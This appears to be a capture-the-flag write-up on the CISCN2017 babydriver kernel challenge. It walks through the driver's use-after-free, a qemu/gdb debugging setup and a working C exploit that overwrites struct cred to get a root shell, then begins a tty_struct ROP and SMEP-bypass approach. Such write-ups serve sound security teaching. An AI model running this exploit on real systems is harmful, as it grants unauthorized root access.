 *  Allocate normal kernel ram. May sleep.
 *
 * %GFP_NOWAIT
 *  Allocation will not sleep.
 *
 * %GFP_ATOMIC
 *  Allocation will not sleep.  May use emergency pools.
 *
 * %GFP_HIGHUSER
 *  Allocate memory from high memory on behalf of user.
 *
 * Also it is possible to set different flags by OR'ing
 * in one or more of the following additional @flags:
 *
 * %__GFP_HIGH
 *  This allocation has high priority and may use emergency pools.
 *
 * %__GFP_NOFAIL
 *  Indicate that this allocation is in no way allowed to fail
 *  (think twice before using).
 *
 * %__GFP_NORETRY
 *  If memory is not immediately available,
 *  then give up at once.
 *
 * %__GFP_NOWARN
 *  If allocation fails, don't issue any warnings.
 *
 * %__GFP_RETRY_MAYFAIL
 *  Try really hard to succeed the allocation but fail
 *  eventually.
 */
static __always_inline void *kmalloc(size_t size, gfp_t flags)
{
  if (__builtin_constant_p(size)) {
#ifndef CONFIG_SLOB
    unsigned int index;
#endif
    if (size > KMALLOC_MAX_CACHE_SIZE)
      return kmalloc_large(size, flags);
#ifndef CONFIG_SLOB
    index = kmalloc_index(size);

    if (!index)
      return ZERO_SIZE_PTR;

    return kmem_cache_alloc_trace(
        kmalloc_caches[kmalloc_type(flags)][index],
        flags, size);
#endif
  }
  return __kmalloc(size, flags);
}

4) babyrelease

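babyrelease is simple: it just frees babydev_struct.device_buf.

Note, however, that although the kernel memory behind the pointer is freed, the function neither clears the device_buf pointer nor resets device_buf_len to 0 afterwards.

5) babyread

IDA's decompilation of babyread is wrong; this is the author's corrected version based on the assembly: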

ssize_t __fastcall babyread(file *filp, char *buffer, size_t length, loff_t *offset)
{
  ssize_t result;

  _fentry__(filp, buffer);
  if ( !babydev_struct.device_buf )
    return -1LL;
  result = -2LL;
  if ( babydev_struct.device_buf_len > length )
  {
    copy_to_user(buffer, babydev_struct.device_buf, length);
    result = length;
  }
  return result;
}

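After checking that device_buf is not NULL, and provided device_buf_len is greater than length, babyread copies memory from device_buf to the user-space buffer.

6) babywrite

babywrite works like babyread in the opposite direction: it copies data from the user-space buffer into the kernel-space device_buf. The corrected decompilation is: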

ssize_t __fastcall babywrite(file *filp, const char *buffer, size_t length, loff_t *offset)
{
  ssize_t result;

  _fentry__(filp, buffer);
  if ( !babydev_struct.device_buf )
    return -1LL;
  result = -2LL;
  if ( babydev_struct.device_buf_len > length )
  {
    copy_from_user(babydev_struct.device_buf, buffer, length);
    result = length;
  }
  return result;
}

7) babyioctl

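babyioctl behaves like realloc: it frees the old device_buf and allocates a new block of memory.

One important point: the size passed to kmalloc here is fully controlled by the user, unlike the fixed 64 used in babyopen.

e. What we have learned

From the analysis above we end up with the following:

Enabled protections:

nx
smep

Potentially exploitable points in the kernel module:

babyrelease does not clear the device_buf pointer after freeing it, and does not reset device_buf_len to 0
babyioctl lets device_buf be reallocated with an arbitrary size
Every variable used by the module is global, which makes it very fragile when accessed concurrently; this may well be exploitable.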
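These three observations combine into a use-after-free. The following is a user-space model only, with made-up names, that tracks the driver's shared global state without touching any real freed memory; it assumes the behaviour described above (open allocates 64 bytes, ioctl reallocates with a user-chosen size, release frees without clearing, read/write require device_buf_len > length).

```c
#include <stdbool.h>
#include <stddef.h>

/* Model of the driver's single global babydev_struct. */
struct dev_model {
    int    buf_id;     /* stands in for the device_buf pointer; 0 means NULL */
    size_t len;        /* device_buf_len */
    bool   buf_freed;  /* true once the buffer behind buf_id has been freed */
};

static struct dev_model dev;
static int next_id = 1;

/* babyopen: every open() overwrites the same globals. */
static void model_open(void)
{
    dev.buf_id = next_id++;
    dev.len = 64;
    dev.buf_freed = false;
}

/* babyioctl: free the old buffer, allocate a new one of user-chosen size. */
static void model_ioctl(size_t size)
{
    dev.buf_id = next_id++;
    dev.len = size;
    dev.buf_freed = false;
}

/* babyrelease: frees the buffer but leaves pointer and length untouched. */
static void model_release(void)
{
    dev.buf_freed = true;
}

/* Would a read/write of `length` bytes pass the checks and hit freed memory? */
static bool model_access_hits_freed(size_t length)
{
    return dev.buf_id != 0 && dev.len > length && dev.buf_freed;
}
```

Opening twice, resizing, and then closing one descriptor leaves the other descriptor with a path to the freed buffer, which is the situation the exploit later relies on.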

4. Preparing to debug

Write the following shell script to start a debugging session quickly:

#!/bin/bash

# Check for root; elevated privileges are needed for gef-remote --qemu-mode
if [ "$(id -u)" -ne 0 ]; then
    echo "Please run this script as root"
    exit 1
fi

# build the exploit statically
gcc exp.c -static -o rootfs/exp

# pack the rootfs
pushd rootfs
find . | cpio -o --format=newc > ../rootfs.cpio
popd

# start gdb
gnome-terminal -e 'gdb -x mygdbinit'

# start qemu
qemu-system-x86_64 \
    -initrd rootfs.cpio \
    -kernel bzImage \
    -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
    -enable-kvm \
    -monitor /dev/null \
    -m 64M \
    --nographic  \
    -smp cores=1,threads=1 \
    -cpu kvm64,+smep \
    -s

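The exploit must be statically linked: the kernel does not provide a standard library, but it always provides system calls.

Obtaining vmlinux

The extract-vmlinux tool can decompress vmlinux out of bzImage.

Loading bzImage directly in gdb yields no kernel symbols at all,

so vmlinux has to be extracted from bzImage first before gdb can load symbols from it.
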
wget https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux
chmod +x ./extract-vmlinux
cd CISCN2017-babydriver/babydriver/
../../extract-vmlinux bzImage > vmlinux
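
In practice, however, every function in the extracted vmlinux is named sub_xxxx, which makes debugging awkward. All kernel symbol and function names are available in the kernel symbol table (or /proc/kallsyms), but matching them up one by one is tedious.

So there is another tool worth using: vmlinux-to-elf

It requires Python 3.5 or later to be installed:
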
sudo apt install python3-pip
sudo pip3 install --upgrade lz4 git+https://github.com/marin-m/vmlinux-to-elf

Usage:

# vmlinux-to-elf <input_kernel.bin> <output_kernel.elf>
vmlinux-to-elf bzImage vmlinux

The resulting vmlinux carries symbols, so gdb can read it and set breakpoints normally.

Check which kernel version the bzImage corresponds to and, if you want to study the kernel in more detail, download the source for that version:

$ strings bzImage | grep "gcc" # or use `file bzImage`
4.4.72 (atum@ubuntu) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #1 SMP Thu Jun 15 19:52:50 PDT 2017

$ curl -O -L https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.4.72.tar.xz
$ unxz linux-4.4.72.tar.xz
$ tar -xf linux-4.4.72.tar

After booting the kernel, don't forget to load the module's symbols in gdb with add-symbol-file:

# in kernel shell:
/ $ lsmod
babydriver 16384 0 - Live 0xffffffffc0000000 (OE)

# in gdb:
gef➤  add-symbol-file babydriver.ko 0xffffffffc0000000

The final mygdbinit:

set architecture i386:x86-64
add-symbol-file vmlinux
gef-remote --qemu-mode localhost:1234

c

# continue first; after insmod, press Ctrl+C manually and then set the breakpoints, so they do not end up pending
add-symbol-file babydriver.ko 0xffffffffc0000000

b babyread
b babywrite
b babyioctl
b babyopen
b babyrelease

c

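5. Exploiting the kernel UAF

a. Overwriting struct cred

A UAF is typically exploited by using a dangling pointer to modify the data in a particular piece of memory, so here we can try the following:

First make a dangling pointer point to a freed piece of memory
Call fork, so that the struct cred allocated for the new child process reuses that memory
Use the dangling pointer to modify the struct cred in that memory at will, which escalates privileges

struct cred stores the credentials of each process. Its layout is: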

/*
 * The security context of a task
 *
 * The parts of the context break down into two categories:
 *
 *  (1) The objective context of a task.  These parts are used when some other
 *  task is attempting to affect this one.
 *
 *  (2) The subjective context.  These details are used when the task is acting
 *  upon another object, be that a file, a task, a key or whatever.
 *
 * Note that some members of this structure belong to both categories - the
 * LSM security pointer for instance.
 *
 * A task has two security pointers.  task->real_cred points to the objective
 * context that defines that task's actual details.  The objective part of this
 * context is used whenever that task is acted upon.
 *
 * task->cred points to the subjective context that defines the details of how
 * that task is going to act upon another object.  This may be overridden
 * temporarily to point to another security context, but normally points to the
 * same context as task->real_cred.
 */
struct cred {
  atomic_t  usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
  atomic_t  subscribers;  /* number of processes subscribed */
  void    *put_addr;
  unsigned  magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD  0x44656144
#endif
  kuid_t    uid;    /* real UID of the task */
  kgid_t    gid;    /* real GID of the task */
  kuid_t    suid;    /* saved UID of the task */
  kgid_t    sgid;    /* saved GID of the task */
  kuid_t    euid;    /* effective UID of the task */
  kgid_t    egid;    /* effective GID of the task */
  kuid_t    fsuid;    /* UID for VFS ops */
  kgid_t    fsgid;    /* GID for VFS ops */
  unsigned  securebits;  /* SUID-less security management */
  kernel_cap_t  cap_inheritable; /* caps our children can inherit */
  kernel_cap_t  cap_permitted;  /* caps we're permitted */
  kernel_cap_t  cap_effective;  /* caps we can actually use */
  kernel_cap_t  cap_bset;  /* capability bounding set */
  kernel_cap_t  cap_ambient;  /* Ambient capability set */
#ifdef CONFIG_KEYS
  unsigned char  jit_keyring;  /* default keyring to attach requested
           * keys to */
  struct key __rcu *session_keyring; /* keyring inherited over fork */
  struct key  *process_keyring; /* keyring private to this process */
  struct key  *thread_keyring; /* keyring private to this thread */
  struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
  void    *security;  /* subjective LSM security */
#endif
  struct user_struct *user;  /* real user ID subscription */
  struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
  struct group_info *group_info;  /* supplementary groups for euid/fsgid */
  struct rcu_head  rcu;    /* RCU deletion hook */
};

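The code that allocates a new process's struct cred sits in the call chain _do_fork -> copy_process -> copy_creds -> prepare_creds.

To avoid fiddly heap grooming and keep the exploit short, we only need the device_buf that babydriver frees to be the same size as sizeof(struct cred). When the kernel next allocates a struct cred, it will then very likely hand out the device_buf chunk that was freed a moment ago.

The vmlinux extracted from the challenge's bzImage has no struct symbols, so we can simply build a new vmlinux with the default configuration and load it to read the size of struct cred: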

gef➤ p sizeof(struct cred)
$1 = 0xa8
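As a rough cross-check of why the sizes have to match, the sketch below rounds a request up to the general-purpose kmalloc size classes. The class list and the helper name kmalloc_bucket are assumptions made for illustration: the real set depends on kernel version and configuration, and struct cred normally comes from its own cred_jar cache, which shares slabs with a kmalloc class only when slab merging puts them together.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed kmalloc size classes (bytes) for a typical x86-64 SLUB kernel. */
static const size_t kmalloc_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Return the smallest assumed size class that fits `size`, or 0 if none does. */
size_t kmalloc_bucket(size_t size)
{
    size_t n = sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]);

    assert(size > 0);   /* kmalloc(0) is special-cased by the kernel */
    for (size_t i = 0; i < n; i++) {
        if (size <= kmalloc_classes[i])
            return kmalloc_classes[i];
    }
    return 0;
}
```

Under these assumptions kmalloc_bucket(0xa8) is 192, so a 0xa8-byte device_buf and a struct cred would compete for the same kind of slab object.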

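Once babyrelease has run, device_buf is a dangling pointer. Note, however, that after a userland process calls close(fd) it can no longer use that file descriptor, so there is no way to write through the same fd after closing it.

What we can exploit is that every variable in babydriver is global: call open twice to get two fds. Even after one fd is closed, the other still lets us write to device_buf.

That gives a complete exploitation flow. The exploit is shown below: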

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

int main() {
    int fd1 = open("/dev/babydev", O_RDWR); // alloc
    int fd2 = open("/dev/babydev", O_RDWR); // alloc
    ioctl(fd1, 65537, 0xa8);    // realloc
    close(fd1); // free

    if (!fork()) {
        // child

        // try to overwrite struct cred
        char mem[4 * 7]; // usage uid gid suid sgid euid egid
        memset(mem, '\x00', sizeof(mem));
        write(fd2, mem, sizeof(mem));

        // get shell
        printf("[+] after LPE, privilege: %s\n", (getuid() ? "user" : "root"));
        system("/bin/sh");
    }
    else
        // parent
        waitpid(-1, NULL, 0);

    return 0;
}

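Note that after fork the parent must wait for the child. Otherwise the parent exits first, the child becomes an orphan process, and it can no longer use the terminal for input and output.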
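The 4 * 7 in the exploit comes from the first seven 4-byte fields of struct cred. The sketch below mirrors that layout in userland to make the arithmetic visible. The struct cred_head and the helper build_cred_payload are hypothetical names, and the layout assumes CONFIG_DEBUG_CREDENTIALS is off and that atomic_t, kuid_t, and kgid_t are each 4 bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical mirror of the first fields of struct cred, assuming
 * CONFIG_DEBUG_CREDENTIALS is off and atomic_t / kuid_t / kgid_t are 4 bytes.
 */
struct cred_head {
    int32_t  usage;
    uint32_t uid, gid;
    uint32_t suid, sgid;
    uint32_t euid, egid;
};

/* Build the payload written over the dangling chunk: every field becomes 0. */
size_t build_cred_payload(unsigned char *out, size_t cap)
{
    struct cred_head head;

    assert(out != NULL && cap >= sizeof(head));
    memset(&head, 0, sizeof(head));   /* uid 0 and gid 0 mean root */
    memcpy(out, &head, sizeof(head));
    return sizeof(head);
}
```

The payload is 28 bytes, which matches char mem[4 * 7] above. Like the exploit, it zeroes usage along with the IDs; whether that is always safe is not examined here.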

Exploit result:

b. Kernel ROP

1) Terminal device types

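Under /dev on Linux, terminal device files usually fall into the following kinds.

Note: not every kind exists on every distribution. For example, /dev/ttyprintk does not exist on my Kali Linux.

- Serial port terminals (/dev/ttySn): terminal devices attached to serial ports, similar to COM ports on Windows.
- Controlling terminal (/dev/tty): the device file for the current process's controlling terminal. It behaves much like a symbolic link and resolves to some concrete terminal file.

  The tty command shows which terminal device it maps to, and ps -ax shows the mapping between processes and controlling terminals.

  Under qemu, passing -append 'console=ttyS0' maps the Linux kernel console onto a /dev/ttySn device.
- Virtual terminals and the console (/dev/ttyN, /dev/console): on Linux, the computer's display is usually called the console terminal (Console). In the initial text-mode interface, handling several tasks at once naturally calls for switching between several terminals. Because these terminals emulate in software what used to be hardware, they are called virtual terminals.

  The difference between a virtual terminal and the console is historical. In the past a terminal was attached over a serial line and was not part of the computer itself, whereas the console was built into the computer, and a computer had exactly one console.

  Put simply, the console is the native device attached directly to the computer, and a terminal is a device connected to the host over a cable, a network, and so on.

  At boot, all messages are shown on the console and not on terminals. In other words, the console is a basic device of the computer and terminals are add-on devices.

  Because the console can do everything a terminal can, it is sometimes loosely called a terminal as well.

  Messages unrelated to any terminal, such as kernel messages and background service messages, can be shown on the console but are not shown on terminals.

  As hardware became plentiful, the distinction between terminal and console has gradually faded.

  Switching between virtual terminals is not the same as switching between terminal windows in an X11 graphical session; it happens one level up. The terminal windows we use every day in a graphical session are pseudoterminals running inside one graphical virtual terminal.

  Press Ctrl+Alt+Fx to switch virtual terminals, where Fx selects the x-th terminal, for example F1.

  tty0 is an alias for the virtual terminal currently in use; messages generated by the system are sent to it.

  On many traditional setups F1-F6 are text terminals and F7-F12 are graphical terminals, though the exact assignment varies by distribution.

  After switching to a text terminal, press Ctrl+Alt+F7 to return to the graphical one.
- Pseudoterminals (/dev/pty): a pseudoterminal (Pseudo Terminal) is a pair of logical terminal devices that behaves much like an ordinary terminal. The difference is that no hardware device sits behind it; its main purpose is to provide a bidirectional channel that gives other programs a terminal-style interface.

  When we log in to a host remotely, the terminal we interact with is a pseudoterminal, and the terminal windows in an everyday graphical session are all pseudoterminals too.

  The two devices of a pseudoterminal are called the master and the slave; the slave behaves just like an ordinary terminal.

  When a program treats a master device as a terminal and reads or writes it, the operation is reflected on the slave device paired with it. The slave is usually read and written by another program, so the two programs can communicate through this pair of logical terminals.

  Modern Linux mainly uses the UNIX 98 pseudoterminals standard, which implements ptys with pts (pseudo-terminal slave, /dev/pts/n) together with ptmx (pseudo-terminal master, /dev/ptmx).

  Using pseudoterminals is covered in detail below.
- Other terminals (such as /dev/ttyprintk): these usually serve a special purpose. For example, /dev/ttyprintk is wired directly to the kernel log buffer.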
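To see which of these device kinds a given file descriptor is attached to, a program can ask libc directly. The following is a minimal sketch using isatty and ttyname_r; the helper name fd_terminal_path is made up for this example.

```c
#include <assert.h>
#include <unistd.h>

/*
 * Copy the terminal device path behind `fd` into `out`.
 * Returns 1 if fd refers to a terminal, 0 otherwise (out is then empty).
 */
int fd_terminal_path(int fd, char *out, size_t cap)
{
    assert(out != NULL && cap > 0);
    out[0] = '\0';
    if (!isatty(fd))
        return 0;
    /* ttyname_r is the reentrant POSIX variant of ttyname(). */
    if (ttyname_r(fd, out, cap) != 0) {
        out[0] = '\0';
        return 0;
    }
    return 1;
}
```

Called on STDIN_FILENO, this would typically report a /dev/pts/N path inside a graphical terminal window and a /dev/ttyN path on a text console. A pipe or regular file is not a terminal, so the function returns 0 for it.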

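2) Using pseudoterminals

There are two implementations of pseudoterminals:

- UNIX 98 pseudoterminals, which use /dev/ptmx (master) and /dev/pts/* (slave)
- Legacy BSD pseudoterminals, which use /dev/pty[p-za-e][0-9a-f] (master) and /dev/tty[p-za-e][0-9a-f] (slave)

Only UNIX 98 pseudoterminals are covered here.

The device file /dev/ptmx exists to open a pseudoterminal pair. When a process opens /dev/ptmx, it gets a file descriptor for a new pseudoterminal master (PTM), and the matching new pseudoterminal slave (PTS) is created under /dev/pts/. The PTM and PTS that different processes get from opening /dev/ptmx are all distinct.

A process can open /dev/ptmx in three ways:

Manually, with open("/dev/ptmx", O_RDWR | O_NOCTTY)

Through the library function getpt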

#define _GNU_SOURCE             /* See feature_test_macros(7) */
#include <stdlib.h>

int getpt(void);

Through the library function posix_openpt

#include <stdlib.h>
#include <fcntl.h>

int posix_openpt(int flags);

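These approaches are essentially equivalent. The library functions are somewhat more portable, because ptmx may not live at /dev/ptmx on every Linux distribution, and they also perform some extra checks.

A process can call ptsname(ptm_fd) to get the path of the matching PTS.

Note that the following two functions must be called, in this order, before the PTS can be opened:

- grantpt(ptm_fd): changes the mode and owner of the slave so that the caller owns it
- unlockpt(ptm_fd): unlocks the slave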
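Put together, the sequence described above (open the master, grantpt, unlockpt, ptsname, open the slave) can be sketched as follows. The helper name open_pty_pair is an assumption for this example, and error handling is kept minimal.

```c
#define _GNU_SOURCE   /* exposes posix_openpt, grantpt, unlockpt, ptsname */
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Open a UNIX 98 pty pair. On success returns 0, stores both descriptors,
 * and copies the slave path (for example /dev/pts/3) into `name`.
 */
int open_pty_pair(int *master, int *slave, char *name, size_t cap)
{
    assert(master != NULL && slave != NULL && name != NULL);

    int m = posix_openpt(O_RDWR | O_NOCTTY);
    if (m == -1)
        return -1;

    /* grantpt, then unlockpt, must both succeed before the slave is opened. */
    const char *path = NULL;
    if (grantpt(m) == 0 && unlockpt(m) == 0)
        path = ptsname(m);
    if (path == NULL || strlen(path) >= cap) {
        close(m);
        return -1;
    }
    strcpy(name, path);

    int s = open(name, O_RDWR | O_NOCTTY);
    if (s == -1) {
        close(m);
        return -1;
    }
    *master = m;
    *slave = s;
    return 0;
}
```

On a system with /dev/ptmx available, the returned slave descriptor passes isatty and its path starts with /dev/pts/.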

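Pseudoterminals serve two main use cases:

- Terminal emulators, which provide terminal functionality to programs such as remote login services (ssh, for example)
- Feeding input to programs that normally refuse to read from a pipe, such as su and passwd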
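The second use case works because whatever is written to the master shows up as terminal input on the slave. The sketch below pushes one line through a fresh pty and reads it back on the slave side. The helper name feed_line_through_pty is hypothetical, and the code assumes the pty starts with default settings (canonical mode), so the line must end with a newline.

```c
#define _GNU_SOURCE   /* exposes posix_openpt, grantpt, unlockpt, ptsname */
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Write `line` to the master side and read it back from the slave side,
 * the way a driver program would answer a password prompt.
 * Returns the number of bytes the slave saw, or -1 on any failure.
 */
ssize_t feed_line_through_pty(const char *line, char *out, size_t cap)
{
    assert(line != NULL && out != NULL && cap > 0);
    size_t len = strlen(line);
    /* In canonical mode read() only returns once a full line has arrived. */
    assert(len > 0 && line[len - 1] == '\n');

    int m = posix_openpt(O_RDWR | O_NOCTTY);
    if (m == -1)
        return -1;
    if (grantpt(m) == -1 || unlockpt(m) == -1) {
        close(m);
        return -1;
    }
    const char *path = ptsname(m);
    int s = path ? open(path, O_RDWR | O_NOCTTY) : -1;
    if (s == -1) {
        close(m);
        return -1;
    }

    ssize_t n = -1;
    /* Unlike a pipe, the slave end counts as a terminal for isatty(). */
    if (isatty(s) && write(m, line, len) == (ssize_t)len)
        n = read(s, out, cap);
    close(s);
    close(m);
    return n;
}
```

A program that checks isatty on its stdin would accept the slave descriptor where it would reject a pipe, which is the property tools built on ptys rely on.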

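The steps above are the low-level functions that any use of a pseudoterminal has to go through. In real pty programming, though, the following functions are used more often:

Reading their source code is a good way to learn how pseudoterminals are used.

openpty: finds a free pseudoterminal and returns the file descriptors of the opened master and slave. Its source is: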

/* Create pseudo tty master slave pair and set terminal attributes
   according to TERMP and WINP.  Return handles for both ends in
   AMASTER and ASLAVE, and return the name of the slave end in NAME.  */
int
openpty (int *amaster, int *aslave, char *name,
  const struct termios *termp, const struct winsize *winp)
{
#ifdef PATH_MAX
  char _buf[PATH_MAX];
#else
  char _buf[512];
#endif
  char *buf = _buf;
  int master, ret = -1, slave = -1;

  *buf = '\0';

  master = getpt ();
  if (master == -1)
    return -1;

  if (grantpt (master))
    goto on_error;

  if (unlockpt (master))
    goto on_error;

#ifdef TIOCGPTPEER
  /* Try to allocate slave fd solely based on master fd first. */
  slave = ioctl (master, TIOCGPTPEER, O_RDWR | O_NOCTTY);
#endif
  if (slave == -1)
    {
      /* Fallback to path-based slave fd allocation in case kernel doesn't
       * support TIOCGPTPEER.
       */
      if (pts_name (master, &buf, sizeof (_buf)))
        goto on_error;

      slave = open (buf, O_RDWR | O_NOCTTY);
      if (slave == -1)
        goto on_error;
    }

  /* XXX Should we ignore errors here?  */
  if (termp)
    tcsetattr (slave, TCSAFLUSH, termp);
#ifdef TIOCSWINSZ
  if (winp)
    ioctl (slave, TIOCSWINSZ, winp);
#endif

  *amaster = master;
  *aslave = slave;
  if (name != NULL)
    {
      if (*buf == '\0')
        if (pts_name (master, &buf, sizeof (_buf)))
          goto on_error;

      strcpy (name, buf);
    }

  ret = 0;

 on_error:
  if (ret == -1) {
    close (master);

    if (slave != -1)
      close (slave);
  }

  if (buf != _buf)
    free (buf);

  return ret;
}

login_tty: starts a login session on the given terminal. Its source is shown below:

int login_tty (int fd)
{
    // start a new session
  (void) setsid();
    // make fd the controlling terminal
#ifdef TIOCSCTTY
  if (ioctl(fd, TIOCSCTTY, (char *)NULL) == -1)
    return (-1);
#else
  {
    /* This might work.  */
    char *fdname = ttyname (fd);
    int newfd;
    if (fdname)
      {
        if (fd != 0)
    (void) close (0);
        if (fd != 1)
    (void) close (1);
        if (fd != 2)
    (void) close (2);
        newfd = open (fdname, O_RDWR);
        (void) close (newfd);
      }
  }
#endif
  while (dup2(fd, 0) == -1 && errno == EBUSY)
    ;
  while (dup2(fd, 1) == -1 && errno == EBUSY)
    ;
  while (dup2(fd, 2) == -1 && errno == EBUSY)
    ;
  if (fd > 2)
    (void) close(fd);
  return (0);
}

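forkpty: combines openpty, fork, and login_tty. A network service can use it to open a pseudoterminal pair for a newly logged-in user and create the corresponding session child process. Its source is: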

int
forkpty (int *amaster, char *name, const struct termios *termp,
   const struct winsize *winp)
{
  int master, slave, pid;
  // open a new pty
  if (openpty (&master, &slave, name, termp, winp) == -1)
    return -1;

  switch (pid = fork ())
    {
    case -1:
      close (master);
      close (slave);
      return -1;
    case 0:
      /* Child.  */
      close (master);
      if (login_tty (slave))
  _exit (1);

      return 0;
    default:
      /* Parent.  */
      *amaster = master;
      close (slave);

      return pid;
    }
}

3) Exploiting tty_struct

When we call open("/dev/ptmx", flag), the kernel allocates a struct tty_struct through the following call chain:

ptmx_open (drivers/tty/pty.c)
-> tty_init_dev (drivers/tty/tty_io.c)
  -> alloc_tty_struct (drivers/tty/tty_io.c)

The layout of struct tty_struct is shown below:

sizeof(struct tty_struct) == 0x2e0

struct tty_struct {
  int  magic;
  struct kref kref;
  struct device *dev;
  struct tty_driver *driver;
  const struct tty_operations *ops;
  int index;

  /* Protects ldisc changes: Lock tty not pty */
  struct ld_semaphore ldisc_sem;
  struct tty_ldisc *ldisc;

  struct mutex atomic_write_lock;
  struct mutex legacy_mutex;
  struct mutex throttle_mutex;
  struct rw_semaphore termios_rwsem;
  struct mutex winsize_mutex;
  spinlock_t ctrl_lock;
  spinlock_t flow_lock;
  /* Termios values are protected by the termios rwsem */
  struct ktermios termios, termios_locked;
  struct termiox *termiox;  /* May be NULL for unsupported */
  char name[64];
  struct pid *pgrp;    /* Protected by ctrl lock */
  struct pid *session;
  unsigned long flags;
  int count;
  struct winsize winsize;    /* winsize_mutex */
  unsigned long stopped:1,  /* flow_lock */
          flow_stopped:1,
          unused:BITS_PER_LONG - 2;
  int hw_stopped;
  unsigned long ctrl_status:8,  /* ctrl_lock */
          packet:1,
          unused_ctrl:BITS_PER_LONG - 9;
  unsigned int receive_room;  /* Bytes free for queue */
  int flow_change;

  struct tty_struct *link;
  struct fasync_struct *fasync;
  int alt_speed;    /* For magic substitution of 38400 bps */
  wait_queue_head_t write_wait;
  wait_queue_head_t read_wait;
  struct work_struct hangup_work;
  void *disc_data;
  void *driver_data;
  struct list_head tty_files;

#define N_TTY_BUF_SIZE 4096

  int closing;
  unsigned char *write_buf;
  int write_cnt;
  /* If the tty has a pending do_SAK, queue it here - akpm */
  struct work_struct SAK_work;
  struct tty_port *port;
};

Look at the fifth field, const struct tty_operations *ops. struct tty_operations is really just a collection of function pointers:

struct tty_operations {
  struct tty_struct * (*lookup)(struct tty_driver *driver,
      struct inode *inode, int idx);
  int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
  void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
  int  (*open)(struct tty_struct * tty, struct file * filp);
  void (*close)(struct tty_struct * tty, struct file * filp);
  void (*shutdown)(struct tty_struct *tty);
  void (*cleanup)(struct tty_struct *tty);
  int  (*write)(struct tty_struct * tty,
          const unsigned char *buf, int count);
  int  (*put_char)(struct tty_struct *tty, unsigned char ch);
  void (*flush_chars)(struct tty_struct *tty);
  int  (*write_room)(struct tty_struct *tty);
  int  (*chars_in_buffer)(struct tty_struct *tty);
  int  (*ioctl)(struct tty_struct *tty,
        unsigned int cmd, unsigned long arg);
  long (*compat_ioctl)(struct tty_struct *tty,
           unsigned int cmd, unsigned long arg);
  void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
  void (*throttle)(struct tty_struct * tty);
  void (*unthrottle)(struct tty_struct * tty);
  void (*stop)(struct tty_struct *tty);
  void (*start)(struct tty_struct *tty);
  void (*hangup)(struct tty_struct *tty);
  int (*break_ctl)(struct tty_struct *tty, int state);
  void (*flush_buffer)(struct tty_struct *tty);
  void (*set_ldisc)(struct tty_struct *tty);
  void (*wait_until_sent)(struct tty_struct *tty, int timeout);
  void (*send_xchar)(struct tty_struct *tty, char ch);
  int (*tiocmget)(struct tty_struct *tty);
  int (*tiocmset)(struct tty_struct *tty,
      unsigned int set, unsigned int clear);
  int (*resize)(struct tty_struct *tty, struct winsize *ws);
  int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
  int (*get_icount)(struct tty_struct *tty,
        struct serial_icounter_struct *icount);
#ifdef CONFIG_CONSOLE_POLL
  int (*poll_init)(struct tty_driver *driver, int line, char *options);
  int (*poll_get_char)(struct tty_driver *driver, int line);
  void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
  const struct file_operations *proc_fops;
};

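Through the UAF we can try to overwrite const struct tty_operations *ops in the freshly allocated tty_struct so that it points to a forged tty_operations. Combined with an operation on the tty (open, ioctl, and so on), that hijacks control flow.

Note: the tty_operations function pointers are used by the various tty_xxx functions in drivers/tty/tty_io.c.

However, SMEP is enabled, so the hijacked control flow can only execute kernel code and cannot jump to user code.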
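Two offsets matter for the overwrite: where ops sits inside tty_struct, and where write sits inside tty_operations. The sketch below mirrors only the leading fields of both structures to compute them. The struct names and the helper set_fake_write are hypothetical, and the layout assumes x86-64 (8-byte pointers), a 4-byte struct kref, and the field order listed above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of the head of struct tty_struct (x86-64 assumed). */
struct tty_struct_head {
    int32_t     magic;
    int32_t     kref;     /* assumed: struct kref wraps one 4-byte counter */
    void       *dev;
    void       *driver;
    const void *ops;      /* the pointer the UAF overwrites */
};

/* Hypothetical mirror of the first eight slots of struct tty_operations. */
struct tty_operations_head {
    void *lookup, *install, *remove, *open, *close, *shutdown, *cleanup;
    void *write;          /* eighth slot */
};

/* Plant `target` in the write slot of a fake table made of 8-byte slots. */
void set_fake_write(uint64_t *fake_ops, size_t slots, uint64_t target)
{
    size_t idx = offsetof(struct tty_operations_head, write) / sizeof(uint64_t);

    assert(fake_ops != NULL && idx < slots);
    fake_ops[idx] = target;
}
```

Under these assumptions ops is at offset 4 + 4 + 8 + 8 = 24 and write is at offset 0x38, that is, index 7 of a table of 8-byte slots.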

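4) ROP exploitation

To reach our goal we need to do the following:

- Escalate privileges
- Bypass SMEP and execute user code

4.1) Hijacking the stack pointer

We need ROP to do all of this, but userland cannot control the kernel stack. So we use a special gadget to pivot the stack pointer into user space, and then drive the rest of the control flow with a ROP chain placed there.

There are many ways to find gadgets. One is the ROPgadget tool used earlier: its advantage is that the output can be piped into a file, but it runs very slowly on a kernel image.

ROPgadget --binary vmlinux

A faster tool worth trying is ropper:

pip3 install ropper
ropper --file vmlinux --console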

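We can hand-build a fake_tty_operations and point its write function pointer at an xchg instruction. When write is then called on /dev/ptmx, the kernel goes through the following call chain:

tty_write -> do_tty_write -> n_tty_write -> tty->ops->write

It ends up using the tty->ops->write function pointer and executes the xchg instruction.

But which xchg instruction? Dynamic debugging combined with static analysis in IDA locates the instruction that actually calls tty->ops->write:

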